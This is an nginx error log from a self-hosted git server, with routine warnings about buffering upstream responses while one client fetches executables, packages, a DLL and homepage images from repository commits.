2026/02/17 13:52:59 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/11/0000014117 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe"
2026/02/17 13:53:15 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/11/0000014118 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg"
2026/02/17 13:54:01 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/11/0000014119 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe"
2026/02/17 13:54:27 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/12/0000014120 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll"
2026/02/17 13:54:29 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/12/0000014121 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll"
2026/02/17 13:54:32 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/12/0000014122 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe"
2026/02/17 13:54:40 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/12/0000014123 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll"
2026/02/17 13:54:47 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/12/0000014124 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll"
2026/02/17 13:54:55 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/12/0000014125 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe"
2026/02/17 13:55:15 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/12/0000014126 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html"
2026/02/17 13:55:20 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/12/0000014127 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png"
2026/02/17 13:55:27 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/12/0000014128 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png"
2026/02/17 13:55:33 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/12/0000014129 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png"
2026/02/17 13:55:41 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/13/0000014130 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png"
2026/02/17 13:55:48 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/13/0000014131 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png"
2026/02/17 13:55:57 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/13/0000014132 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png"
2026/02/17 13:56:05 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/13/0000014133 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png"
2026/02/17 13:56:07 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/13/0000014134 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html"
2026/02/17 13:56:13 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/13/0000014135 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png"
2026/02/17 13:56:19 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/13/0000014136 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png"
2026/02/17 13:56:27 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/13/0000014137 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png"
2026/02/17 13:56:34 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/13/0000014138 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png"
2026/02/17 13:56:41 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/13/0000014139 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png"
2026/02/17 13:56:47 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/14/0000014140 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png"
2026/02/17 13:56:55 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/14/0000014141 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png"
2026/02/17 13:57:01 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/14/0000014142 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html"
2026/02/17 13:57:03 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/14/0000014143 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html"
2026/02/17 13:57:13 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/14/0000014144 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png"
2026/02/17 13:57:20 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/14/0000014145 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png"
2026/02/17 13:57:28 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/14/0000014146 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png"
2026/02/17 13:57:36 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/14/0000014147 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png"
2026/02/17 13:57:45 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/14/0000014148 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png"
2026/02/17 13:57:54 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/14/0000014149 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png"
2026/02/17 13:57:56 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/15/0000014150 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png"
2026/02/17 13:57:57 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/15/0000014151 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png"
2026/02/17 13:58:09 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/15/0000014152 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png"
2026/02/17 13:58:37 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/15/0000014153 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe"
2026/02/17 13:58:40 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/15/0000014154 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg"
2026/02/17 13:59:52 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/15/0000014155 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe"
2026/02/17 13:59:59 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/15/0000014156 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe"
2026/02/17 14:00:27 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/15/0000014157 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe"
2026/02/17 14:00:36 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/15/0000014158 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg"
